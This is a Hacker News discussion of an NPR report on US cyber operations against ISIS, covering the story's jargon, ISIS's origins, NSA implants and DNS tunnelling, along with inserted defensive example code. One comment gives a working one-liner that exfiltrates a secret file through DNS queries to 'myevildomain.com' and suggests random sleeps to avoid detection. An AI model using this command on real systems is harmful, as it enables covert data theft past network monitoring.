How the US Hacked ISIS (npr.org)
> After that, the momentum started to build. One team would take screenshots to gather intelligence for later; another would lock ISIS videographers out of their own accounts.
> "Reset Successful" one screen would say.
> "Folder directory deleted," said another.
Folder directory??? Did they also delete the "file document"?
> The screens they were seeing on the Ops floor on the NSA campus were the same ones someone in Syria might have been looking at in real time, until someone in Syria hit refresh. Once he did that, he would see: 404 error: Destination unreadable.
404 error: Destination unreadable??? At least, use "unreachable"...
> "Target 5 is done," someone would yell.
> Someone else would walk across the room and cross the number off the big target sheet on the wall. "We're crossing names off the list. We're crossing accounts off the list. We're crossing IPs off the list," said Neil. And every time a number went down they would yell one word: "Jackpot!"
[0] TV Tropes: Hollywood Hacking is when some sort of convoluted metaphor is used not only to describe hacking, but actually to put it into practice. Characters will come up with rubbish like, "Extinguish the firewall!" and "I'll use the Millennium Bug to launch an Overclocking Attack on the whole Internet!" https://tvtropes.org/pmwiki/pmwiki.php/Main/HollywoodHacking
Very likely something happened, but it almost certainly wasn't like this.
"On August 24, 2015, a 21-year-old British hacker named TriCk stepped out of an Internet cafe in Raqqa, Syria, and climbed into his car. He didn't know it, but he'd been under surveillance for days. He pulled into a gas station, and just as he started filling the tank, a single Hellfire missile came down on him like a meteor from the sky. He was killed instantly."
And it seems to be longer too.
https://www.npr.org/transcripts/763545811
They also later identify the "British hacker's" name: Junaid Hussain.
A report from Britain, 2015, claims it wasn't an operation done by the U.S. alone:
https://www.birminghammail.co.uk/news/midlands-news/isis-ter...
I obviously don't know how accurate this piece is but a "folder directory" is, or at least used to be, a legit way to describe a folder full of folders.
You'll see outdated/unorthodox terminology like this all the time in old systems, and even some newer ones that were built or maintained by people who aren't native English speakers. Daily WTF used to be filled with this kind of stuff.
Thanks, that's interesting.
"So, X has been infiltrating <company> for the past few days."
"Really? <company>? <famous company>?"
"Yep. We're keeping them looped in on everything, and they told us to try to get as far as possible. Apparently they were running <outdated version> of <software> on one of their boxes, and <scanner> picked it up."
"That actually happens?"
"He's <highly surprising claim> right now. You'd be surprised how far you can get, jumping from one box to another."
I can't give much more detail than that, for obvious reasons, but the reality is that it's very methodical, very "boring" work. It's basically a giant matrix of probabilities: there are hundreds of thousands of attack vectors, and your job is to tap as many as possible, sorted by probability of effectiveness, until something sticks. Then use your head to get further, adapting to the situation on the fly.
And ... writing reports. Jesus, if someone had told me that 70% of your day would be spent writing reports, I probably wouldn't have joined. But the 30% of other stuff made up for it.
That feeling you get when you break into somewhere you're not supposed to be, and that you were paid to do it, is amazing. The rules change from engagement to engagement, but usually it's "do whatever you want, but don't modify any data, i.e. no destructive actions, and all info you've collected will be deleted at the end of the engagement."
Must be interesting to be a spook in the NSA doing that kind of stuff offensively.
Also, it might seem absurd that I'm comparing this story to the most elite hackers in the developed world. And maybe it is. But if you knew which <company> it was, and exactly what <highly surprising claim> was, you'd be shocked that one or two smart developers poking at internals were able to compromise the entire corporate network of <famous company>, to the point of being able to... well. Let's just say, I wish I could say. It's a weird feeling, seeing it with my own eyes, knowing it's true, and never being able to talk fully about it. :)
So I imagine the NSA spooks are doing similarly methodical work, with some cheat codes like "we intercepted their computer before delivery and installed a backdoor that only activates when we send a specially malformed packet that would normally be dropped and is therefore invisible, which grants us access as needed."
As far as I understand, error-correcting codes can be and are used at different levels of communication protocols (hardware at each link, hardware at the endpoints, software at the endpoints, ...).
I often wonder if recoverable errors at the endpoints are ever used to exfiltrate data. The higher levels of the stack would see the corrected overt message, while the underlying levels (hardware or software) that perform the error correction have access to the covert information encoded in the error.
This may be testable with an FPGA, sorting connections by protocol, origin, destination, ... to identify connections with a suspiciously high number of ECC-recoverable errors compared to the rest.
This may be very hard to test if MitM'ed (by ISP, network card manufacturer, ...) such that benign packets get recoverable errors introduced as well (to hide the malicious ones in the noise), which would increase the complexity since now the malicious hardware or software at the endpoints needs to discriminate artificial errors from covert messages over the error channel. There would be many ways of going about this.
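The per-connection statistic proposed in the comments above, as an added example (not code from the thread): a Hamming(7,4) decoder counts how often it had to correct a codeword in each flow, and a flow whose corrected-error rate sits far above the others is flagged. The flows, the 2% baseline flip rate and the z-score threshold are all constructed assumptions for the demonstration.

```python
"""Added example: per-flow corrected-error rate as an anomaly signal.
Every flow here is constructed locally; nothing is captured from a network."""
import random
from statistics import mean, pstdev

# Parity-check matrix of Hamming(7,4): column j is the binary form of j (1..7),
# so a nonzero syndrome is directly the 1-based position of a single flipped bit.
H = [[1, 0, 1, 0, 1, 0, 1],
     [0, 1, 1, 0, 0, 1, 1],
     [0, 0, 0, 1, 1, 1, 1]]


def encode(nibble):
    """Place 4 data bits at positions 3,5,6,7 and compute parity bits 1,2,4."""
    d1, d2, d3, d4 = nibble
    c = [0] * 7
    c[2], c[4], c[5], c[6] = d1, d2, d3, d4
    c[0] = c[2] ^ c[4] ^ c[6]
    c[1] = c[2] ^ c[5] ^ c[6]
    c[3] = c[4] ^ c[5] ^ c[6]
    return c


def syndrome(codeword):
    """Syndrome as an int 0..7; 0 means no detectable error."""
    s = 0
    for i, row in enumerate(H):
        s |= (sum(r * c for r, c in zip(row, codeword)) % 2) << i
    return s


def decode(codeword):
    """Correct at most one flipped bit. Returns (codeword, corrected_flag)."""
    s = syndrome(codeword)
    if s == 0:
        return list(codeword), False
    fixed = list(codeword)
    fixed[s - 1] ^= 1
    return fixed, True


def make_flow(n_words, flip_rate, rng):
    """Constructed traffic: random data words, each hit by one bit flip with
    probability flip_rate. A noisy but honest link has a low rate."""
    flow = []
    for _ in range(n_words):
        cw = encode([rng.randint(0, 1) for _ in range(4)])
        if rng.random() < flip_rate:
            cw[rng.randrange(7)] ^= 1
        flow.append(cw)
    return flow


def corrected_rate(flow):
    """Fraction of codewords in the flow that needed correction."""
    return sum(decode(cw)[1] for cw in flow) / len(flow)


def flag_outliers(flows, z_threshold=3.0, sigma_floor=0.01):
    """flows: name -> list of codewords. A flow is flagged when its corrected-error
    rate exceeds the mean of the other flows by z_threshold standard deviations
    (sigma_floor keeps a near-identical baseline from flagging harmless jitter)."""
    rates = {name: corrected_rate(f) for name, f in flows.items()}
    flagged = []
    for name, rate in rates.items():
        others = [r for n, r in rates.items() if n != name]
        mu, sigma = mean(others), max(pstdev(others), sigma_floor)
        if rate > mu + z_threshold * sigma:
            flagged.append(name)
    return flagged


def demo_flows(seed=1):
    """Five ordinary flows plus one where every codeword carries a correctable
    error, i.e. the error channel is being driven deliberately (all constructed)."""
    rng = random.Random(seed)
    flows = {f"flow-{i}": make_flow(500, 0.02, rng) for i in range(5)}
    flows["flow-suspect"] = make_flow(500, 1.0, rng)
    return flows


if __name__ == "__main__":
    flows = demo_flows()
    for name, flow in flows.items():
        print(f"{name}: corrected-error rate {corrected_rate(flow):.3f}")
    print("flagged:", flag_outliers(flows))
```

The leave-one-out comparison matters: with the suspect flow included in everyone's baseline, the honest flows would never be flagged, while the suspect flow is judged against a baseline it is not part of. The MitM variant the comment describes (artificial errors sprinkled into benign flows) would raise that baseline and is exactly what this simple statistic cannot separate.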
> And what they contained weren't glowing lines of code: Instead, Neil could see login screens.
maybe they're dealing with the kind of people who name their folders "directory"
It's all fun and games until someone melts down a reactor.
The journalist is probably playing with Cunningham's Law, but I distinctly recall the doomsday gap scene ( https://news.ycombinator.com/item?id=24481298 ) as having been closer to the middle of Dr. Strangelove. The end came after the referent of https://www.youtube.com/watch?v=K10pdj5YOy0 .
Bonus clip (note the lack of any source attribution problem in these cases): https://www.youtube.com/watch?v=nZ8oA9-OQrg
I suspect shutting down their media probably stopped having an effect through novelty wearing off, all the best recruits being recruited and the world moving on to (inadvertently or not) selling some other reactionary rebellion - and the group being militarily defeated in Syria.
(I trust Linebarger more than Bernays because the former also catalogues not only his failures, but sotto voce, even touches upon those of his mid-twentieth century society.)
Bonus clip: https://www.youtube.com/watch?v=mLNAkPsjAEk (what's the hip hop equivalent?)
why does china care so much about the dalai lama?
I'd guess because:
https://en.wikipedia.org/wiki/CIA_Tibetan_program
"a nearly two decades long anti-Chinese covert operation focused on Tibet which consisted of "political action, propaganda, paramilitary and intelligence operations""
"Although it was formally assigned to the CIA, it was nevertheless closely coordinated with several other U.S. government agencies such as the Department of State and the Department of Defense."
Dalai Lama is where he is now as the result of this.
https://theintercept.com/2018/01/29/isis-iraq-war-islamic-st...
https://www.abc.net.au/news/2019-12-18/inside-the-islamic-st...
"Doc of the Day: NSA, DHS Trade Players for Net Defense"
https://www.wired.com/2010/10/doc-of-the-day-nsa-dhs-trade-p...
The fatigues are common in the pictures:
https://www.cyberscoop.com/us-cyber-command-nsa-government-h...
Edit: Really not sure why I got downvoted, as I provided accurate info?
Yeah.. probably not how it happened.
There were 80 people inside one of the most powerful rooms in the world, so they just used his first name to protect his identity.
That article was painfully too long.
[0] one example: https://www.theguardian.com/guardian-observer-style-guide-a
Headers will be sent over the wire in the clear before any redirection can occur.
A localhost-bound proxy can fix this before the request leaves the network interface.
I guess the "modern" browser fixes this for everyone else not using a ("modern") proxy.
Only if the site owner wants it so https://hstspreload.org/
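A check for the site-owner side of this, added here as an example (not code from the thread): it parses a Strict-Transport-Security header and reports what would keep the policy off the preload list. The thresholds (max-age of at least one year, includeSubDomains, preload) are the hstspreload.org requirements as I understand them; treat them as assumptions and confirm on the site.

```python
"""Added example: does an HSTS policy meet the preload-list requirements?"""

ONE_YEAR = 31536000  # assumed preload minimum for max-age, in seconds


def parse_hsts(header):
    """Split an STS header value into a dict. Directive names are
    case-insensitive per RFC 6797; valueless directives map to True."""
    directives = {}
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        name, sep, value = part.partition("=")
        directives[name.strip().lower()] = value.strip().strip('"') if sep else True
    return directives


def hsts_issues(header, preload_min_age=ONE_YEAR):
    """Return the list of reasons the policy would not qualify for preloading;
    an empty list means it passes these checks."""
    d = parse_hsts(header)
    if "max-age" not in d:
        return ["max-age directive missing (header is not a valid STS policy)"]
    if d["max-age"] is True or not d["max-age"].isdigit():
        return ["max-age must be a non-negative integer"]
    issues = []
    max_age = int(d["max-age"])
    if max_age < preload_min_age:
        issues.append(f"max-age {max_age} is below the preload minimum {preload_min_age}")
    if "includesubdomains" not in d:
        issues.append("includeSubDomains missing")
    if "preload" not in d:
        issues.append("preload directive missing")
    return issues


if __name__ == "__main__":
    for h in ("max-age=31536000; includeSubDomains; preload", "max-age=300"):
        print(f"{h!r}: {hsts_issues(h) or 'ok for preload'}")
```

Note that even a perfect header only helps after a browser has seen it once over HTTPS; the preload list is what closes the first-request window the comment above describes.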
Think about Enigma and Lorenz, or any cold war double agent - you've got this fountain of knowledge but if you start burning assets left right and centre they'll realize something's wrong (Or in the case of MI6 they'll get embarrassed and allow the double agent to slip away as long as they shut up)
Inspired by a low-tech single-ply version: https://en.wikipedia.org/wiki/Operation_Scherhorn
and Linebarger's suggestion for how to drive enemy intelligence mad: http://www.gutenberg.org/files/48612/48612-h/48612-h.htm#Pag...
> "If you feel like showing off, average everything into everything else and call it the Gross Index of Total Enemy Morale. This won't fool anyone who knows the propaganda business, and you won't be able to do anything with or about it, but you can hang it on a month-by-month chart in the front office, where visitors can be impressed at getting in on a military secret. (Incidentally, if some smart enemy agent sees it and reports it back, enemy intelligence experts will go mad trying to figure out just how you got that figure. It's like the old joke that the average American is ten-elevenths White, 52% female, and always slightly pregnant.)"
TIL CthulhuPunk is a thing.
Anyone familiar enough with the Cthulhu-mythos to tell me if there are any impediments in canon to the following retcon: what if Great Old Ones are Scissor Entities, and appear to xenophobes as horrific monsters of vaguely anthropoid outline, with octopus-like heads and prodigious claws, but to xenophiles as animated pegasus unicorns, and, as part of their eternal struggle against the Blue Meanies, drive the former to gibbering madness but invite the latter over for tea?
https://i.pinimg.com/originals/e9/a4/fa/e9a4fae35f467f77b98b...
ISIS was actually there, founded by Zarqawi like any other group, but its main differentiator was its swift rise to power and popularity after 2011 benefiting from the unbearable oppression of Sunnis in Iraq by Iran and its proxy, which made them align with whoever could be their savior and get rid of the Iranian influence. You can see this clearly when ISIS stormed the prisons where thousands of Sunnis were sentenced to death, and made them into the second wave of recruits.
The US did enable ISIS, Zarqawi and co created it, Iran gave people a reason to join it en masse, and the international agenda, most importantly the US objective of getting its enemies (Iran and ISIS) to bleed each other, and the Kurdish leftists asking for its help to the degree of becoming its proxies, left a space for it to be the monster it was.
Also can't ignore the Turkish and Kurdistani indifference (before ISIS started attacking them, there were ISIS/Kurdistani checkpoints side by side, drinking tea together), and the Syrian allowance of fighters flooding into Iraq through its eastern borders since the invasion.
Blaming only the US (although it's the initial culprit) doesn't address the complexity of this problem.
He got to manage a country that just got invaded, that used to have a huge military and where the occupiers are still fighting the remnants of rebel forces in some part of the country.
In that context, he decided that the former officers from Saddam Hussein's regime would be barred from the new Iraq military and that they should not receive pension either.
Hey, put yourself in their shoes: when your job is to organize a military, and the only lawful employer has refused your services and denies your pension, are you going to go homeless and beg in the streets or are you going to join a rebellious startup?
The ISIS of the origin was organized just like the Baath army was, because that's the framework the officers knew. There were some documents captured (that involved less "hacking" than physical invasion of command structures but of course we never know the amount of covert ops going on) and what they revealed was that one budget line was the biggest of the whole organization: pensions. Suicide bombing is not the career path everybody chose there.
ISIS is not a US creation: that would imply GWB's administration capacity to plan such a thing. But it came from crucial mistakes the US did despite being warned about these years prior.
The apocalyptic aspect (literally), for instance, is essential to understanding ISIS, and its early split from Al-Qaeda, for example.
The US turned a blind eye because ISIS was fighting a regime they wanted to change. They could have pressured Turkey and Qatar to stop; and they would oblige. But everything has a cost I guess.
Stopping the help provided by outside countries may have weakened the movement, but not prevented it.
The US finances many terrorist groups ourselves, so I'm not sure what your point is—nations are happy to take advantage of new powers regardless of how it conflicts with their propaganda. I don't know how you could look at the invasion of Iraq and come away with the conclusion that ISIS is either surprising or could have formed without our help.
(for a different blue-on-blue scenario: what might the cyber equivalent of leaving a grenade pin on an officer's pillow be?)
The invasion wasn't the hamfisted part - the problem was being reckless after the invasion and not really thinking properly about how to manage the country.
Note how the USSR dissolved without intervention.
Dropping bombs is like taking antibiotics, sometimes necessary but always creates resistance.
And who supplied those weapons of mass destruction to saddam? I wonder...
I won't go so far as to say that the whole fiasco could have been avoided with a functioning economy and some new civil service/protection branch to absorb the officers, but the US's strategy was one of the biggest contributors to ISIS's growth.
> "But there are U.S. intelligence officials who still worry about what Cyber Command’s rise will mean for espionage missions."
suggests another domestic explanation for revealing Glowing Symphony would be turf wars with non-concurring bureaucracies.
(Apparently successfully, judging by 2020 changes to US code buried somewhere in the appropriations bill S.1790 § 1632.
Poorer US HN'ers may be interested to know there's also language in that bill about cyber pay rates, which I left unread but would guess implies they're attempting to be competitive with private sector compensation.)
Examples I've seen so far (note that it's not always triggered, there must be some "if" conditions here. It's not always reproducible).
* All lower-case titles are capitalized.
Generally good, but not always enforced, it's strange.
* Unnecessary caps are removed.
Many false positives. "MIT CSAIL" becomes "MIT Csail", DARPA becomes "Darpa", etc.
* "%d Ways To Do X" and "How To Do X" becomes "Do X", per Guideline.
It misfired when I tried to submit "20 °C – A Short History of the Standard Temperature for Dimensional Measurements" by NIST. The "20" was removed and I had to edit it back!
A submission of "How we threat model" by GitHub became "We threat model", which makes the already-short title unreadable.
* Clickbait words are removed.
Generally good. But false positives exist. For example, "Massive Parallel" is a legitimate concept in computing, but the word "massive" will be removed. I just tried "Massive MIMO", which is similarly a legitimate concept in communication, and it got removed as well.
Try submitting this paper "Pilot Optimization and Channel Estimation for Multiuser Massive MIMO Systems" (https://arxiv.org/abs/1402.0045), you'll see that the word "massive" is deleted immediately after submission (but as I said, the reformatter is not always triggered and not always reproducible, perhaps your high karma will stop the filter from doing it).
* "Your Statement is 100% correct" becomes "Statement is 100% correct".
This is a good one, the unnecessary personal element is removed.
That story, and that's what it is, has to be put in the form of a bad movie, considering the intellectual level of the target audience.
Kipling on empire, in Her Majesty's Servants (a story addressed to children but not necessarily intended for them):
> "But are the beasts as wise as the men?" said the chief.
> "They obey, as the men do. Mule, horse, elephant, or bullock, he obeys his driver, and the driver his sergeant, and the sergeant his lieutenant, and the lieutenant his captain, and the captain his major, and the major his colonel, and the colonel his brigadier commanding three regiments, and the brigadier his general, who obeys the Viceroy, who is the servant of the Empress. Thus it is done."
> "Would it were so in Afghanistan!" said the chief; "for there we obey only our own wills."
> "And for that reason," said the native officer, twirling his moustache, "your Amir whom you do not obey must come here and take orders from our Viceroy."
"Nakasone said the American people shouldn't worry about the 2020 elections because Cybercom is prepared to prevent the Russians from repeating what they did in 2016."
"TEMPLE-RASTON: Even saying that much is new. Remember - offensive cyber not so long ago was something they didn't talk about, and now, all of a sudden, they seem to be. So why is General Nakasone talking about this now?
DEIBERT: What's happening here is part of a deterrent justification."
Then they give an explanation of this using some lines from Dr. Strangelove.
By the way, the show was "written and hosted by Dina Temple-Raston," who also wrote the article, and I liked the show.
-----
Edit: responding to "deterrent could easily be communicated privately" below: -- no, that's too narrow thinking: consider the potential target as "anybody who'd be willing to try it at home." That's a much bigger target group than potential workers. Also consider every "it" that people would be potentially scared to do.
Edit2: re. the edit of the post below involving joke with the submarines -- I fail to see any relation to anything discussed here, and I'd also like to know if anybody but the writer even understands what the joke is. I honestly don't. Meh.
Edit3: re "MAD": Like I've said I don't believe it's about MAD, but "anybody who'd be willing to try it at home." Anybody in front of the computer anywhere in the world, including, but not exclusively, some future "Junaid Hussain." (and, if I'm closer to the correct answer, Cybercom can give me 10 upvotes here).
Edit4: I think I understand it now after it's added that the "joke meant to illustrate MAD" -- I guess he didn't follow the link, but reacted to "Dr. Strangelove" reference believing it's about MAD, even if it never was. As per transcript, it's there to argue: "if you keep it a secret [i.e. American offensive cyber operations] - you could say the same thing about American offensive cyber operations. They've been so stealthy for so long, maybe people don't realize the U.S. has them." Note "people." As is, people wouldn't be scared to do something the U.S. doesn't like, instead of thinking who'd be the target of next U.S. drone attack.
As written in https://news.ycombinator.com/item?id=24522125 I don't believe everyone apparently having more offensive than defensive capability is necessarily the most stable of situations.
[1] the true end: https://www.youtube.com/watch?v=cIpTE-aHEZ0
On the "mineshaft gap": https://news.ycombinator.com/item?id=23712008
Have you got change for 20 million people? https://boardgamegeek.com/boardgame/713/nuclear-war
[2] "There was too much there to move, and we knew we had to break [Chrome], burn her straight down, or she might come after us."
(b) taking out an electrical grid is not at all comparable to MAD.
I'd imagine domestic recruiting to be more likely, along the lines of the prime-time channel 1 song-and-dance mentioned in: https://news.ycombinator.com/item?id=24453689
==== Edit: joke meant to illustrate (b), the Assured Destruction part that makes MAD a non-iterated game. I agree that if TFA is not about MAD, then threatening Proportional Inconvenience can be an effective deterrent in an iterated game, a deterrent much more applicable to future Hussains than to future Bystrovs. (indeed, in that scenario, I would worry about non-nuclear powers swatting each other via Uscybercom) ====
In the middle of the Caribbean, a US sub, gleaming and spotless, surfaces next to a dingy-in-comparison Russian sub, whose boomers are sprawled out in undershorts and telnyashki, listlessly passing around vodka bottles across a littered foredeck.
One of them is murmuring over and over again, "which one of you idiots threw slippers on control board?"
On the US sub, a dress-uniformed officer in Randolph Engineering glasses emerges from the hatch. "This is the Captain of the USS Alaska. May I speak with your captain, please?"
On board the Russian sub, the only response is the clinking and refilling of glasses.
"I repeat, I am Commander William Dull, captain of the USS Alaska, SSBN 732. I would like to speak with your captain!"
A small fight breaks out on the Russian sub over who last poured.
"Damn it, what is up with you russkies? Do you call that shipshape? At least we learn discipline back home at King's Bay! Di. Sci. Pline!"
"Don't you get it?" yells back the murmuring Russian, in English now. "Is no King's Bay any more." Then he recommences his Russian refrain, a little more loudly, "Oi, which one of you idiots threw valenki on control board?"
Here's one I do understand: Suppose you want to exfiltrate some data out of a network without raising alarms. One way to do it is to set up a DNS server. Basically, you use DNS itself as a communication method, not merely a lookup table.
I've never actually used it, but it always seemed a cool idea. Almost no one blocks DNS, which means you can send data from anywhere in the world in a very unexpected way. You'd of course want to keep the transmission size reasonable (perhaps 5GB of DNS traffic might raise some eyebrows) but any system that you can `nslookup foo.com 8.8.8.8` on, you'd be able to `nslookup foo.com <your special server>` on. So this technique works in almost every case, except extremely monitored systems that only allow outgoing connections to a specific set of restricted IP addresses.
But for the special network protocol that the NSA uses to access backdoored NICs, I forget why it works, since the packet would need to pass through many routers along the way. In fact, I feel like I'm misremembering. Most target computers are behind routers, so it really doesn't make sense. Maybe it's a technique used against routers themselves. All I remember is that the NSA has some type of "signals we can send which normal networking tooling doesn't detect at all," along with a dose of "we know Iran just ordered some new servers, so we intercepted the servers and installed a backdoor." (The latter is called TAO: https://en.wikipedia.org/wiki/Tailored_Access_Operations)
They definitely do something with NICs though. The ANT document (https://en.wikipedia.org/wiki/NSA_ANT_catalog#Capabilities_l...) shows "COTTONMOUTH-III is a stacked Ethernet and USB plug costing approximately $1.25M for 50 units." Must be one hell of a plug.
https://en.wikipedia.org/wiki/NSA_ANT_catalog#/media/File:NS... is also pretty neat. It's a USB airgap bridge, i.e. janitor walks up and plugs it in to the target device. I wonder what the range on stuff like that is... Seems like you'd have to be sitting outside in a van or something, which is rather hard to do if your target is a nuclear enrichment facility (stuxnet).
You don’t need to tell nslookup to use a special server. If you control the SOA for your own domain, the normal DNS server will happily exfiltrate your data for you.
The technique worked well for portals that allowed arbitrary DNS-over-UDP as well as portals that had their own exclusive DNS - provided that those portals worked by redirecting all IP traffic (i.e. they didn't fake DNS results).
It was slow though... I think I maxed out at around 8KBps (~64kbps) - barely enough for basic email functionality and text-only web-surfing.
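The defender's side of the DNS-as-a-channel idea discussed in the comments above, as an added example (not code from any commenter): it scans resolver query-log lines for a client that sends many long, high-entropy leftmost labels to a single zone, which is the shape that encoding data into hostnames produces. The log lines and their BIND-style layout are constructed for the demonstration, and the "zone" is approximated as the last two labels (no public-suffix list).

```python
"""Added example: flag clients whose DNS queries look like encoded payload.
The sample log is constructed; the query-log layout is an assumption."""
import math
import re
from collections import Counter, defaultdict

# Constructed lines in a BIND-style query-log layout (assumed format, not real traffic).
SAMPLE_LOG = """\
client 10.0.0.5#51234: query: www.example.com IN A + (10.0.0.2)
client 10.0.0.5#51235: query: mail.example.com IN MX + (10.0.0.2)
client 10.0.0.7#40001: query: Q29uc3RydWN0ZWQgc2FtcGxlIGNodW5rIG9uZSBmb3IgdGhlIGV4YW1wbGU.myevildomain.com IN A + (10.0.0.2)
client 10.0.0.7#40002: query: c2Vjb25kIGNvbnN0cnVjdGVkIGNodW5rIHdpdGggbW9yZSBzYW1wbGUgYnl0ZXM.myevildomain.com IN A + (10.0.0.2)
client 10.0.0.7#40003: query: dGhpcmQgY2h1bmsgc28gdGhlIGRldGVjdG9yIGhhcyBhIHBhdHRlcm4gdG8gc2.myevildomain.com IN A + (10.0.0.2)
client 10.0.0.9#53000: query: cdn.example.com IN A + (10.0.0.2)
"""

QUERY_RE = re.compile(r"client (\S+)#\d+: query: (\S+) IN (\S+)")


def entropy(s):
    """Shannon entropy of a string in bits per character (0.0 for empty input)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def parse_queries(log_text):
    """Yield (client_ip, qname, qtype) for every line that matches the layout."""
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            yield m.group(1), m.group(2).rstrip("."), m.group(3)


def suspicious_domains(log_text, min_label_len=30, min_entropy=3.5, min_queries=2):
    """Group queries by (client, zone) and flag groups whose leftmost labels are,
    on average, both long and high-entropy. Ordinary hostnames ('www', 'mail')
    fail both tests; base64-looking chunks pass both."""
    labels_seen = defaultdict(list)
    for client, qname, _ in parse_queries(log_text):
        labels = qname.split(".")
        if len(labels) < 3:
            continue  # bare zone apex, nothing encoded in front of it
        zone = ".".join(labels[-2:]).lower()  # assumption: two-label zones
        labels_seen[(client, zone)].append(labels[0])
    flagged = []
    for (client, zone), firsts in labels_seen.items():
        if len(firsts) < min_queries:
            continue
        avg_len = sum(map(len, firsts)) / len(firsts)
        avg_ent = sum(map(entropy, firsts)) / len(firsts)
        if avg_len >= min_label_len and avg_ent >= min_entropy:
            flagged.append({"client": client, "zone": zone, "queries": len(firsts),
                            "avg_label_len": round(avg_len, 1),
                            "avg_entropy": round(avg_ent, 2)})
    return flagged


if __name__ == "__main__":
    for hit in suspicious_domains(SAMPLE_LOG):
        print(hit)
```

Thresholds like these need tuning against a site's real baseline (CDNs and some telemetry services also use long machine-generated labels), and the volume dimension the commenters mention, many queries to one otherwise-unknown zone, is the cheaper signal to alert on first.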
https://www.congress.gov/bill/116th-congress/senate-bill/179...
§ 5707 (c)(2): "the implications of [5G] global and regional adoption on the cyber and espionage threat to the United States, the interests of the United States, and the cyber and collection capabilities of the United States;"
Does taking antibiotics always result in antibiotic resistant bacteria?
I wasn't aware of that, and at first glance it seems implausible as otherwise all antibiotics would have been ineffective before we even discovered them?
Your wider point still stands though, various parts of nature have been putting chemical warfare against each other for a very long time.
We'd best be careful we don't suddenly find ourselves on the wrong side of that battle.
The point in the article after mentioning Dr. Strangelove uses however the same wording that I've pointed to:
"You could say the same thing about American offensive cyber operations. They have been so stealthy for so long, maybe people don't realize we have them."
It's even easier than that if you just want to sneak a relatively small file out.
for n in $(base64 mysecretfile|sed 's/.\{63\}/&\n/g'); do nslookup $n.myevildomain.com; done
Then get the file out of your evil DNS server logs at the other end. Of course this depends on how much DNS logging the local site is doing and if anyone is paying attention to those logs, but a few random sleeps should help there.
So banks then do ridiculous things like checking your timezone and checking your name and the memo fields so they get to have a stronger defense in court.
Sure enough, the transaction was blocked, my account was disabled, and I had to send paypal an email saying that I wasn’t an arms dealer.
> PayPal is currently blocking all transactions containing the word “tardigrade”
https://news.ycombinator.com/item?id=24450828
And one of the top comments said:
> PayPal gets a list of banned strings from the Office of Foreign Asset controls. If any match those strings it's flagged for a review.
Not really. Antibiotic treatment selects for existing variation within bacteria.
Some bacteria may already be weakly tolerant. Using antibiotics will likely lead to that trait being selected for, and the tolerance becomes stronger.
What have you been studying to get to PhD level, as per your profile info?
You obviously know what you're talking about, and I only have a fairly lay-level understanding :)